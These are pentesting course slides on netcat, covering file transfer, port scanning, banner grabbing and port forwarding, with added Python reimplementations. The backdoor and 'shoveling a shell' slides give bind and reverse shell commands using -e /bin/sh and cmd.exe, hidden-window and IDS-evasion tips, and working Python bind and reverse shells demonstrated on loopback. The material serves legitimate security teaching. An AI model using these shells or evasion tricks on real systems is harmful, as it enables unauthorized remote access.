COMP265 - Pentesting netcat

Page 1

COMP265 - Pentesting

netcat

Page 2

What?

• Like cat, but for networks

• Standard input sent over network to remote ip:port

• Packets from network sent to standard output

• Low level

• Versatile

• “The network Swiss army knife”

Page 3

Basic Operation

• Client mode:

– Connects to specific remote port

• Listen mode:

– Waits for connection on a port

• Both modes

– Send Standard Input to net

– Data from net sent to Standard Output

• Messages from netcat sent to standard Error

• Packets can have source routing attached

Page 4

Netcat Command

• May be the two-letter command “nc”

– Like cp and other traditional two-letter Unix commands

– nc [options] hostname port[s]

• May be the word “netcat”

• Another variant “ncat”, from nmap project

– Supports a few more options

• Depends on the platform, Kali has both

• Sometimes have to compile from source to get all options (Suse)

Page 5

Command Options

-l listen mode, for inbound connects

-L "Listen harder" Persistent listener (Win only)

-n numeric-only IP addresses, no DNS

-p port local port number

-r randomize local and remote ports

-s addr local source address

-u UDP mode

--sctp SCTP mode (ncat only)

-v verbose [use twice to be more verbose]

Page 6

Command Options

-i secs delay interval for lines sent, ports scanned

-t answer TELNET negotiation

-w secs timeout for connects and final net reads

-z zero-I/O mode [used for scanning]

These three options are not available in some packages (distribution builds often leave -e out)

-o file (netcat) or -x file (ncat) hex dump of traffic

-e prog or -c command program to exec after connect

-g gateway source-routing hop point[s], up to 8

Page 7

What for?

• Send files

• Telnet

• Backdoor

• Port scan

• Banner grabbing

• Reverse shell

• Relay (proxy)

• Port forward

• Replay

Page 8

Arguments

• Host can be a name or an IP

– -n = no DNS lookups, IP only; otherwise netcat does a full DNS forward and reverse lookup (and warns on a fwd/rev mismatch)

• -v or -vv = verbose messages, always sent to standard error

• -w limits wait time; -w 3 recommended

• -o filename produces a dump of all traffic, each line marked > (sent) or < (received)

• -i slows down sending, used if input comes from a file

Page 9

Send Files

• Sender

– nc -l -p 80 < file.txt

– cat file.txt | nc -l -p 80

• Receiver

– nc 192.168.1.1 80 > file.txt

• Note use of redirect and pipe

• Receiver could have been a web browser

• < > | all enhance power of netcat

• Listening on port 80 needs root; use a high port otherwise. Anyone who can reach the port gets the file: netcat adds no authentication or encryption

Page 10

Another Example

dd if=/dev/sda3 | gzip | nc -l 80

nc 192.168.17.1 80 > sda3.img.gz

• Note the listener is nc -l 80 here but nc -l -p 80 on the previous slide: OpenBSD-derived nc takes the port as a positional argument, traditional netcat needs -l -p 80, ncat accepts either. Check nc -h on the box before relying on a one-liner

• Or, listener can be receiver

nc -w 3 -l 80 > /home.cmb.tar.gz

tar -cvf - /home/cmb | gzip | nc 192.168.17.1 80
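Added example, not code from the slides: the listener/sender transfer above written with Python sockets, so it runs without any nc binary, plus the check the one-liners lack, a SHA-256 computed independently on both ends. The loopback address, the ephemeral port and the 1 MiB random payload are constructed for the demo.

```python
"""Added example (not from the COMP265 slides): 'nc -l -p PORT > file' on one
side and 'nc HOST PORT < file' on the other, as Python sockets, with a SHA-256
taken on each end so the transfer can actually be verified."""
import hashlib
import os
import socket
import tempfile
import threading


def start_receiver(bind_addr, port, dest_path):
    """Listener side, like 'nc -l -s BIND -p PORT > dest': accept exactly one
    connection, write everything received to dest_path, record the peer and
    the hash. Port 0 means 'pick a free one'; the chosen port is returned
    in the result dict so the sender can be pointed at it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(1)
    result = {"port": srv.getsockname()[1]}

    def run():
        conn, peer = srv.accept()
        srv.close()                      # one shot, like nc -l without -L
        h = hashlib.sha256()
        with conn, open(dest_path, "wb") as out:
            while True:
                chunk = conn.recv(65536)
                if not chunk:            # sender closed its write side: EOF
                    break
                out.write(chunk)
                h.update(chunk)
        result["peer"] = peer
        result["sha256"] = h.hexdigest()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    result["thread"] = t
    return result


def send_file(host, port, src_path, timeout=3.0):
    """Client side, like 'nc -w 3 HOST PORT < src': stream the file, then
    shut down the write side so the receiver sees EOF. Returns the hash."""
    h = hashlib.sha256()
    with socket.create_connection((host, port), timeout=timeout) as s, \
            open(src_path, "rb") as f:
        while True:
            chunk = f.read(65536)
            if not chunk:
                break
            s.sendall(chunk)
            h.update(chunk)
        s.shutdown(socket.SHUT_WR)
    return h.hexdigest()


def transfer_demo():
    """Round-trip a constructed 1 MiB random file over loopback.
    Returns (sender hash, receiver hash, bytes written on the receiver)."""
    tmpdir = tempfile.mkdtemp()
    src = os.path.join(tmpdir, "file.txt")
    dst = os.path.join(tmpdir, "received.txt")
    with open(src, "wb") as f:
        f.write(os.urandom(1024 * 1024))     # constructed payload
    rx = start_receiver("127.0.0.1", 0, dst)
    sent = send_file("127.0.0.1", rx["port"], src)
    rx["thread"].join(10)
    return sent, rx["sha256"], os.path.getsize(dst)
```

Binding to a specific address (the -s option) and comparing the two hashes out of band is the minimum a practitioner should do: the first host to reach the listening port wins, and nothing in netcat tells you whether the bytes that arrived are the bytes that were sent.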

Page 11

nc vs telnet

cmblap:~ # telnet 192.168.17.24 25

Trying 192.168.17.24...

Connected to 192.168.17.24.

Escape character is '^]'.

220 fivefortyfour.com ESMTP

^C

^]

telnet> quit

Connection closed.

cmblap:~ # netcat 192.168.17.24 25

220 fivefortyfour.com ESMTP

helo

250 fivefortyfour.com

quit

221 fivefortyfour.com

cmblap:~ #

Page 12

As telnet client

• Netcat quits when you want it to

• Doesn't exit on standard-input EOF; keeps reading from the network until the remote side closes (GNU netcat adds -q, OpenBSD nc adds -N, to change this)

• Doesn't require escape character

• Less cruft

• Transfers arbitrary binary data

• Better utility for probing services

• Can use UDP

-t responds automatically to telnet option negotiations

Page 13

Probing?

• Netcat can do port scans

• This took around 1 sec

cmblap:~ # netcat -v -w 2 -z 192.168.17.24 20-1000

jabber.fivefortyfour.com [192.168.17.24] 631 (ipp) open

jabber.fivefortyfour.com [192.168.17.24] 445 (microsoft-ds) open

jabber.fivefortyfour.com [192.168.17.24] 139 (netbios-ssn) open

jabber.fivefortyfour.com [192.168.17.24] 111 (sunrpc) open

jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open

jabber.fivefortyfour.com [192.168.17.24] 80 (http) open

jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open

jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open

jabber.fivefortyfour.com [192.168.17.24] 24 (?) open

jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open

cmblap:~ #

Page 14

UDP scans too

• These are much slower

• Treat a UDP "open" with caution: netcat reports a port open when no ICMP port-unreachable comes back, so a firewall that silently drops the probe looks the same as a listening service

cmblap:~ # netcat -v -w 2 -z -u 192.168.17.24 20-100

jabber.fivefortyfour.com [192.168.17.24] 67 (bootps) open

jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open

Page 15

Scanning Options

-i

– Delay interval to slow down scans

-r

– Randomise ports, including source

-z

– Send no data (TCP) or minimal data (UDP)

-i and -r help to avoid IDS (spread-out, non-sequential probes are less obvious)

-vv reports closed ports

Page 16

Fancier Scan

echo QUIT | nc -v -w 5 target-host 20-250 500-600 5990-7000

• Several port ranges in one run; the QUIT gives services that wait for input something to answer, so their banners show up as well

Page 17

Banner Grabbing

cmblap:~ # netcat -v 192.168.17.24 110

jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open

+OK Hello there.

quit

+OK Better luck next time.

cmblap:~ # netcat -v 192.168.17.24 25

jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open

220 fivefortyfour.com ESMTP

quit

221 fivefortyfour.com

cmblap:~ # netcat -v 192.168.17.24 22

jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open

SSH-1.99-OpenSSH_4.1

quit

Protocol mismatch.
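Added example, not code from the slides: what the scan on the "Probing?" and "UDP scans too" slides and the banner-grab sessions above actually do, written with Python sockets so it runs offline against a constructed stand-in for the 192.168.17.24 mail server. It shows the three outcomes a TCP connect scan really distinguishes, and why a UDP "open" from nc -u -z only means that no ICMP port-unreachable came back. The loopback addresses, ports and the "220 lab.example ESMTP" banner are made up for the demo.

```python
"""Added example (not from the COMP265 slides): 'netcat -v -w 2 -z HOST PORTS'
and 'netcat -v HOST 25' reimplemented with sockets, against a fake SMTP server."""
import socket
import threading

TIMEOUT = 2.0  # same role as -w 2 on the slides


def tcp_probe(host, port, timeout=TIMEOUT):
    """One full TCP connect per port (what -z does): 'open' (handshake done),
    'closed' (RST came back) or 'filtered' (nothing came back before -w)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:               # includes the timeout
        return "filtered"
    finally:
        s.close()


def udp_probe(host, port, timeout=TIMEOUT, payload=b"\x00"):
    """UDP has no handshake. A closed port usually answers with ICMP port
    unreachable, which a *connected* UDP socket surfaces as ECONNREFUSED.
    Silence means open or filtered; only an application reply proves open."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        s.send(payload)
        s.recv(1024)
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "open|filtered"
    finally:
        s.close()


def connect_scan(host, ports, timeout=TIMEOUT):
    """Sequential scan; returns {port: state}. A sleep between probes is -i,
    shuffling the port list is -r."""
    return {p: tcp_probe(host, p, timeout) for p in ports}


def grab_banner(host, port, probe=b"", timeout=TIMEOUT):
    """Connect, optionally send a probe first (the 'echo QUIT |' trick for
    services that stay silent until spoken to), return the first reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            return s.recv(1024).decode("ascii", "replace").strip()
        except socket.timeout:
            return ""


def fake_smtp_server(banner=b"220 lab.example ESMTP\r\n"):
    """Constructed stand-in for the slides' mail server: loopback listener that
    greets with an SMTP banner and answers QUIT. Returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    conn.sendall(banner)
                    if conn.recv(64).upper().startswith(b"QUIT"):
                        conn.sendall(b"221 lab.example\r\n")
                except OSError:
                    pass      # a -z probe hangs up without talking; fine

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def closed_port():
    """Find a loopback port nothing listens on (bind to 0, then release it)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port
```

The open|filtered result is the honest version of netcat's UDP "open". On the TCP side the distinction between closed (an RST arrived) and filtered (the -w timeout expired) is worth keeping: a run of "filtered" ports is a firewall, not an empty host.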

Page 18

Chat Session

• Just for fun

• Machine 192.168.17.6

– nc -l -p 1234

• Machine 2

– nc 192.168.17.6 1234

• Each machine's keyboard input appears on the other machine's screen

• Note: use -v option to solve problems that may appear

Page 19

Web Browser

printf 'GET / HTTP/1.0\r\nHost: somewhere.com\r\n\r\n' | nc somewhere.com 80 > page.html

• The request has to be a real HTTP request line followed by a blank line; the whole reply, headers included, lands in page.html

Page 20

Backdoor

• By handing the connection to a command interpreter as its standard input and output (-e), we create a remote shell

cmblap:/usr/local/src/netcat-0.7.1/src # ./netcat -l -n -v -s 192.168.18.8 -p 1234 -e /bin/sh

Connection from 192.168.18.1:4289

cmblap:/usr/local/src/netcat-0.7.1/src #

• I had to download and build netcat to enable the -e switch; distribution packages often leave it out

• -e cannot pass parameters to the program; ncat's -c / --sh-exec runs a full command line through /bin/sh instead

Page 21

On the other end

pdlnx2:~ # netcat -v 192.168.18.8 1234

DNS fwd/rev mismatch: cmblap.fivefortyfour.com != cmblap

cmblap.fivefortyfour.com [192.168.18.8] 1234 (search-agent) open

df

Filesystem 1K-blocks Used Available Use% Mounted on

/dev/sda6 20641788 7448780 12144368 39% /

udev 1540268 192 1540076 1% /dev

/dev/sda2 39942856 8711724 31231132 22% /windows/C

/dev/sda8 20650996 17395552 2206404 89% /home/cmb

exit

pdlnx2:~ #

Page 22

More backdoors

• On windows:

nc -L -p 1234 -d -e cmd.exe

• -L means listen harder

– re-listen after the client disconnects, so the backdoor survives the first session

– Not needed on unix

• -d means detach from the console (no visible window)

– Also not needed on linux

Page 23

“Shoveling” a Shell

• Aka Reverse Shell

• Compromised machine cannot accept connections

– Has to initiate connections because of firewall/NAT

• Attacker listens from outside the firewall

– netcat -v -l -p 1234

• Script on compromised machine starts shell then connects to attacker

– netcat ip.addr 1234 -e /bin/sh

• Script has to run forever, or at timed intervals, or in response to some event
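Added example, not code from the slides: what the -e /bin/sh on the backdoor slide and the shoveled shell here actually do, in Python, so the mechanism can be run on loopback without a netcat build that has -e. In both directions the process holding the connection hands the socket to the shell as its stdin, stdout and stderr and then just waits; one helper serves the bind shell and the reverse shell. The loopback addresses, ports and the "echo ... exit" command lines are constructed for the demo.

```python
"""Added example (not from the COMP265 slides): the fd plumbing behind
'netcat -l -p PORT -e /bin/sh' (bind) and 'netcat HOST PORT -e /bin/sh'
(reverse), demonstrated on loopback with a harmless echo."""
import socket
import subprocess
import threading


def attach_shell(conn, argv=("/bin/sh",)):
    """What -e does: run argv with all three standard streams on the socket,
    wait for it to exit, then close the connection. Returns the exit status.
    Because this takes an argv, the 'cannot pass parameters' limit of -e
    does not apply (ncat's -c/--sh-exec gives netcat the same freedom)."""
    proc = subprocess.Popen(list(argv), stdin=conn, stdout=conn, stderr=conn)
    status = proc.wait()
    conn.close()
    return status


def bind_shell(bind_addr, port, argv=("/bin/sh",)):
    """netcat -l -n -s BIND -p PORT -e /bin/sh: wait for one inbound
    connection. Returns the bound port; the shell is served on a thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(1)

    def serve():
        conn, _peer = srv.accept()
        srv.close()
        attach_shell(conn, argv)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def reverse_shell(host, port, argv=("/bin/sh",)):
    """netcat HOST PORT -e /bin/sh: the compromised side connects *out*, so an
    inbound-only firewall or NAT does not stop it. Blocks until the shell exits."""
    conn = socket.create_connection((host, port))
    return attach_shell(conn, argv)


def drive(conn, commands, timeout=5.0):
    """Operator side: send command lines, collect output until the shell
    exits and the connection closes."""
    conn.settimeout(timeout)
    conn.sendall(commands)
    out = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            break
        out += chunk
    conn.close()
    return out.decode()


def demo_bind():
    """Operator connects in to the waiting backdoor (slide 21's 'df' session)."""
    port = bind_shell("127.0.0.1", 0)
    conn = socket.create_connection(("127.0.0.1", port))
    return drive(conn, b"echo bind $((6*7))\nexit 0\n")


def demo_reverse():
    """Operator runs the listener (netcat -v -l -p PORT); the victim side
    connects out and the operator drives it over that connection."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    threading.Thread(target=reverse_shell, args=("127.0.0.1", port),
                     daemon=True).start()
    conn, _ = srv.accept()
    srv.close()
    return drive(conn, b"echo reverse $((6*7))\nexit 0\n")
```

On the operator's side the reverse case is nothing more than netcat -v -l -p 1234: the listener accepts and copies bytes, and everything interesting happens on the connecting host, which is exactly why it gets through inbound filtering. The whole session is plaintext in both directions.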

Page 24

Port Forwarding

• Forwarding localhost port 8080 to remote host port 80

• ncat -l localhost 8080 --sh-exec "ncat remote.host 80"
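Added example, not code from the slides or from the nmap project: the --sh-exec forwarder above as a plain Python relay, plus a simplified version of the -o/-x traffic dump from the options slides (one line per chunk, > for bytes going out to the remote side, < for bytes coming back). Like --sh-exec, every client gets its own fresh outbound connection. The loopback addresses, ports and the echo server standing in for remote.host:80 are constructed for the demo.

```python
"""Added example (not from the COMP265 slides or ncat): a TCP port forwarder
in the spirit of 'ncat -l localhost 8080 --sh-exec "ncat remote.host 80"',
with a -o style dump of both directions."""
import socket
import threading


def dump_line(direction, data):
    """Simplified -o record: direction marker, byte count, hex of the chunk."""
    return "%s %5d %s" % (direction, len(data), data.hex())


def pump(src, dst, direction, log):
    """Copy src -> dst until EOF, recording each chunk, then half-close dst so
    the far side sees the EOF too (otherwise sessions never end)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.append(dump_line(direction, data))
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def port_forward(listen_addr, listen_port, remote_host, remote_port, log):
    """Accept clients on (listen_addr, listen_port) and relay each one to
    (remote_host, remote_port) in both directions. Returns the bound port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_addr, listen_port))
    srv.listen(5)

    def relay(client):
        remote = socket.create_connection((remote_host, remote_port))
        out = threading.Thread(target=pump, args=(client, remote, ">", log))
        back = threading.Thread(target=pump, args=(remote, client, "<", log))
        out.start()
        back.start()
        out.join()
        back.join()
        client.close()
        remote.close()

    def accept_loop():
        while True:
            client, _ = srv.accept()
            threading.Thread(target=relay, args=(client,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def echo_server():
    """Constructed stand-in for remote.host:80: returns whatever it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    def serve():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def relay_demo(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Client -> local forwarder -> echo server and back; returns (reply, log)."""
    log = []
    remote_port = echo_server()
    local_port = port_forward("127.0.0.1", 0, "127.0.0.1", remote_port, log)
    with socket.create_connection(("127.0.0.1", local_port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)     # done sending; echo, then EOF, come back
        reply = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply, log
```

--sh-exec forks a new ncat per client and lets the two processes' stdio do the copying; keeping the bytes in one process, as here, is what makes it possible to log both directions of every session, which is the same record -o gives you for a single connection. Note the half-close in pump(): a forwarder that only closes sockets when both sides are done is the usual reason a relayed session hangs after one end sends EOF.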

Page 25

References

• ncat: http://nmap.org/ncat/

– User's guide is a good reference: http://nmap.org/ncat/guide/index.html

• netcat: http://netcat.sourceforge.net/

• Don't forget the man pages

Page 26

Lab

• Lab today will exercise many of these functions

• Due the day of the lab next week, Feb 18

– No new lab next week